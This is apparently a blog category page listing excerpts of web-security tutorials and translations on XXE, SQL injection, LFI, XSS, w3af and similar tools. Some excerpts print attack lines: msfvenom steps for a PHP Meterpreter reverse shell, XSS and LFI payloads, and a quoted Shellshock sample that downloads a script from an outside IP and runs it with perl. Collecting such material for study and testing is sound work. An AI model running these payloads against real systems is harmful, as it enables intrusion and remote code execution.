web
文章平均质量分 55
iteye_16188
这个作者很懒,什么都没留下…
展开
-
[转]Forcing XXE Reflection through Server Error Messages
原文地址:[url]https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/[/url]XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web reques...原创 2015-05-19 01:10:22 · 124 阅读 · 0 评论 -
网站管理员页面一览
从[url]http://packetstormsecurity.com/files/112855/Admin-Page-Finder-Script.html[/url]中找到的,代码中是一次遍历每种可能的url,感觉不如单独拿出来使用GHDB效果更好php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4...原创 2014-11-26 21:51:31 · 1007 阅读 · 0 评论 -
Laudanum
项目地址:[url]http://sourceforge.net/projects/laudanum/[/url]Laudanum是可注入文件集合,用于在SQL注入被发现后使用,提供shell,DNS查询,LDAP信息原创 2014-11-20 01:42:54 · 558 阅读 · 0 评论 -
[译]18个火狐插件
原文地址:[url]http://resources.infosecinstitute.com/use-firefox-browser-as-a-penetration-testing-tool-with-these-add-ons/[/url]1. FoxyProxy StandardFoxyProxy是一个火狐高级代理。它提高了代理的性能。它可以基于url来不停轮换使用不同的代理服...原创 2014-11-18 21:41:48 · 406 阅读 · 0 评论 -
php Meterpreter Webshell
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php2. 上传a.php到web服务器3. 启动msfconsole4. use multi/handler5. set LHOST Attacker's_IP6. set LPORT 4437. set ...原创 2014-11-17 02:22:17 · 385 阅读 · 1 评论 -
全路径泄漏
参考:https://www.owasp.org/index.php/Full_Path_Disclosurehttp://yehg.net/lab/pr0js/view.php/path_disclosure_vulnerability.txt(一)危害1)/var/www/html可能导致文件夹遍历或LFI漏洞2)/home/vicky/public_html/...原创 2014-11-17 01:43:16 · 734 阅读 · 0 评论 -
xss payload
1. 代码来自xssya.pyhttp://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E", "1%253CScRiPt%2520%253Eprompt%28962477%29%2...原创 2014-11-15 23:51:11 · 233 阅读 · 0 评论 -
recon-ng 百度模块
kali中使用recon-ng中recon/hosts/gather/http/web/baidu_site模块[code="java"]recon-ng > use recon/hosts/gather/http/web/baidu_siterecon-ng [baidu_site] > set domain sina.comDOMAIN => sina.comrecon-ng ...原创 2014-11-14 01:34:36 · 1549 阅读 · 0 评论 -
[译]突破sql字符限制
原文地址:[url]http://www.greensql.com/blog/2011/09/shortest-sql-injection-attack/[/url][b]场景1.[/b]在本场景中,web应用程序接收first-name和last-name,然后输入匹配的Email地址(代码参考附录A)正常发送到数据库的sql语句如下[code="sql"]select Emai...原创 2014-11-11 01:12:22 · 158 阅读 · 0 评论 -
PHP LFI
1. LFIhttp://www.example.com/index.php?m[color=red][b]=php://filter/convert.base64-encode/resource=[/b][/color]indexhttp://www.example.com/index.php?m[color=red][b]=php://filter/read=convert.base6...原创 2014-11-09 00:53:14 · 191 阅读 · 0 评论 -
[译]web安全测试chrome插件
原文地址:http://resources.infosecinstitute.com/19-extensions-to-turn-google-chrome-into-penetration-testing-tool/[b]1 Web Developer[/b] 可以用于分析HTML和JS等 地址https://chrome.google.com/webstore/detail/w...原创 2014-11-07 00:00:03 · 422 阅读 · 0 评论 -
HTTP Traceroute
该工具用来跟踪http的forward响应。如果访问的是https网站,那么检查证实,如果出错,则给出警告。代码[url]http://digi.ninja/files/http_traceroute_1.1.tar.bz2[/url]亦可参考:[url]http://digi.ninja/projects/http_traceroute.php[/url][code="java"...原创 2014-11-06 00:11:50 · 401 阅读 · 0 评论 -
DotDotPwn的https模式
参考:[url]http://www.spentera.com/2012/03/directory-traversal-with-dotdotpwn-https-mode/[/url][url]https://www.stunnel.org/howto.html[/url]使用stunnel程序,stunnel参考[url]https://www.stunnel.org/index...原创 2014-11-05 22:26:06 · 206 阅读 · 0 评论 -
服务器端包含注入
原文地址:[url]https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection[/url][url]http://resources.infosecinstitute.com/server-side-includes-ssi-injection/[/url]服务器端包含注入SSI出现在动态填写HTML页面的场...原创 2014-12-05 01:21:10 · 266 阅读 · 0 评论 -
文档-保护php文件上传
原文地址:[url]http://www.gremwell.com/sites/default/files/php-file-upload.pdf[/url]原创 2014-12-09 00:36:55 · 77 阅读 · 0 评论 -
工具--excesspy 客户端邮件xss检查工具
项目地址:[url]https://github.com/allodoxaphobia/excesspy[/url]基本原理:从[url]http://ha.ckers.org/xssAttacks.xml[/url]下载各种xss payload,然后填充在mail的body,subject,from,to,header中,发送HTML格式邮件,然后客户端检查邮件。需要有一个账号,发...原创 2014-12-09 01:14:24 · 151 阅读 · 0 评论 -
CVE-2011-2461
[url]http://blog.nibblesec.org/2015/03/the-old-is-new-again-cve-2011-2461-is.html[/url][url]http://blog.mindedsecurity.com/2015/03/the-old-is-new-again-cve-2011-2461-is.html[/url]code:[url]htt...原创 2015-03-31 01:19:14 · 141 阅读 · 0 评论 -
[译]从配置错误的web server中dump git数据
原文地址:[url]https://blog.netspi.com/dumping-git-data-from-misconfigured-web-servers/[/url]通常情况:[img]http://dl2.iteye.com/upload/attachment/0106/9841/6fc51806-5049-3c28-aec1-4b0d0512c081.png[/img]...原创 2015-03-26 01:07:54 · 101 阅读 · 0 评论 -
[转]Microsoft Access sqli
[url]https://milo2012.wordpress.com/2012/02/18/sql-injection-for-microsoft-access/[/url]原创 2015-03-18 00:57:49 · 123 阅读 · 0 评论 -
[转]sqlmap注入Microsoft Access
[url]https://github.com/sqlmapproject/sqlmap/issues/423[/url][quote]Valid statements that show the numbers in the resulting html page:...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,1...原创 2015-03-18 00:49:45 · 885 阅读 · 0 评论 -
crossdomain.xml
参考:[url]https://hackerone.com/reports/43070[/url][url]http://sethsec.blogspot.in/2014/07/crossdomain-bing.html[/url][url]http://gursevkalra.blogspot.in/2013/08/bypassing-same-origin-policy-with-...原创 2015-03-12 01:23:33 · 384 阅读 · 0 评论 -
[译]使用wireshark解密TLS浏览器流量
原文地址:[url]https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/[/url]Wireshark常见的问题是不能轻松分析加密的数据,例如TLS。它只能解密RSA密钥交换的加密流量。[b]Session Key Logging to the Rescue!...原创 2015-03-12 00:57:29 · 344 阅读 · 0 评论 -
xxe方法
原文地址:[url]http://www.christian-schneider.net/GenericXxeDetection.html[/url]自动化工具:[url]https://github.com/Gifts/XXE-OOB-Exploitation-Toolset-for-Automation[/url]发现XXE:在黑盒渗透测试过程中,通常会遇到REST模式并使用J...原创 2015-02-01 18:32:45 · 162 阅读 · 0 评论 -
owasp zed--Web Sockets
[url]http://digi.ninja/blog/zap_web_sockets.php[/url][url]http://digi.ninja/blog/zap_fuzzing.php[/url][color=blue](一)web socket基础使用[/color]下面两张图显示三条信息,箭头表示消息去向/来自客户端[img]http://dl2.iteye.com...原创 2015-01-31 01:16:37 · 291 阅读 · 0 评论 -
[译]linux使用软连接读取本地文件
原文地址:[url]http://josipfranjkovic.blogspot.com/2014/12/reading-local-files-from-facebooks.html[/url]前提条件:可以上传任意后缀文件。首先尝试上传php文件,没有被执行,但是文件内容却在base64解码之后被返回了。接下来我尝试将我的文件命名为"/etc/passwd", "file:///et...原创 2015-01-25 00:28:03 · 723 阅读 · 0 评论 -
linux install firefix&plugin
1. download firefox&plugins2. tar vxf Firefox-latest-x86_64.tar.bz23. tar vxf install_flash_player_11_linux.x86_64.tar.gz4. cp install_flash_player_11_linux.x86_64.tar.gz /usr/lib/mozilla/plugin...原创 2015-01-22 20:56:28 · 138 阅读 · 0 评论 -
Sinatra--超级轻量级web框架
Sinatra是一个超轻量级web框架介绍:http://www.infoq.com/cn/articles/sinatra-intro/中文文档:http://www.sinatrarb.com/intro-zh.html英文文档:http://www.sinatrarb.com/intro.html...原创 2015-01-17 00:30:41 · 399 阅读 · 0 评论 -
Shellshock示例
来自:[url]http://pastebin.com/Qbgn09Wa[/url]邮件:[quote]===To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend References:() { :; };wget -O /tmp...原创 2014-12-19 01:21:08 · 97 阅读 · 0 评论 -
使用Tesseract 识别验证码
参考:[url]http://code.google.com/p/tesseract-ocr/[/url][url]https://stackoverflow.com/questions/2363490/limit-characters-tesseract-is-looking-for[/url][url]http://resources.infosecinstitute.com/ca...原创 2014-12-10 00:48:23 · 109 阅读 · 0 评论 -
[译]dotdotpwn使用
原文地址:https://github.com/wireghoul/dotdotpwn/blob/master/EXAMPLES.txt[b]= HTTP Module[/b][code="java"]./dotdotpwn.pl -m http -h 192.168.1.1 -x 8080 -f /etc/hosts -k "localhost" -d 8 -t 200 -s[/...原创 2014-11-05 21:26:29 · 459 阅读 · 0 评论 -
sslyze简介
项目地址:https://github.com/nabla-c0d3/sslyze是一个SSL服务器配置分析工具。它的设计宗旨为为快速,广泛,可以用来帮助组织和测试人员识别这个错误配置[quote]root@kali:~# sslyze -h REGISTERING AVAILABLE PLUGINS ----------------------------- ...原创 2014-11-02 16:40:39 · 1196 阅读 · 0 评论 -
默认口令枚举DPE
原文地址:[url]http://resources.infosecinstitute.com/dpe-the-structured-enumeration-of-default-credentials-and-passwords/[/url]DPE: Default Password EnumerationDPE主要目标是增加"密码审计扫描器"的操作性。在渗透测试过程中,安全审计人员通常...原创 2014-11-02 00:21:58 · 198 阅读 · 0 评论 -
[ssl]解密-网络监控
原文:[url]http://resources.infosecinstitute.com/ssl-decryption/[/url]SSL和网络监控是最不搭的一对的基友-即使是最高端的监控架构。从被加密的数据流中不会获得很多有价值的信息。考虑到如下图所示的Sguil sensor的处境:[img]http://dl2.iteye.com/upload/attachment/0101/...原创 2014-10-05 00:10:55 · 407 阅读 · 0 评论 -
[转]sqli雅虎
原文地址:http://www.sec-down.com/wordpress/?p=494Today I will blog about a SQL Injection vulnerability that were escalated to Remote Code Execution, Escalated to Root Privilege on one of Yahoo servers....原创 2014-09-29 20:36:59 · 86 阅读 · 0 评论 -
[译]w3af指南(四)
原文:[url]http://resources.infosecinstitute.com/w3af-tutorial-4/[/url]之前的文件我们学习了w3af中的插件以及他们的应用场合。本文,我们将学习一些w3af中附带的其他工具,他们可以帮助我们发送Manual Requests,进行Fuzzing,加密/解密请求和应答,使用代理截获/修改请求/应答,以及允许我们进行不同的HTTP请求...原创 2014-09-25 22:55:29 · 299 阅读 · 0 评论 -
[译]w3af指南(三)
原文地址:http://resources.infosecinstitute.com/w3af-tutorial-3/本文将继续介绍前文剩下的插件。本文继续使用前文使用的Web Security Dojo虚拟机,下载地址:[url]http://sourceforge.net/projects/websecuritydojo/files/[/url][b]1)Brute force...原创 2014-09-24 00:52:31 · 350 阅读 · 0 评论 -
[译]w3af指南(二)
原文链接:[url]http://resources.infosecinstitute.com/w3af-tutorial-2/[/url]本文我们将继续学习如何使用w3af的discovery和audit插件来进行web漏洞扫描和相应的漏洞利用。同时我们将学习各种w3af使用的技术来发现这些漏洞。本文我们使用gui版本。[b]Web Security Dojo[/b]进行测试...原创 2014-09-23 17:22:36 · 284 阅读 · 0 评论 -
[译]w3af指南(一)
原文出自:http://resources.infosecinstitute.com/w3af-tutorial/w3af (Web Application audit and attack framework)是一个web安全审计框架。本文将学习w3af的大部分特性以及如何使用它进行web渗透测试。[b][color=red][注]原文写于2012年。最新的w3af是1.6.0....原创 2014-09-23 12:57:01 · 584 阅读 · 0 评论 -
[转]owasp使用w3af自动化审计
href:https://www.owasp.org/index.php/Automated_Audit_using_W3AF[code="html"]# -----------------------------------------------------------------------------------------------------------# ...原创 2014-09-22 22:03:31 · 360 阅读 · 0 评论 -
Web Application finger printing Methods/Techniques and Prevention
http://anantshri.info/articles/web_app_finger_printing.html#.U_3zt_mK_0c原创 2014-08-28 00:37:11 · 149 阅读 · 0 评论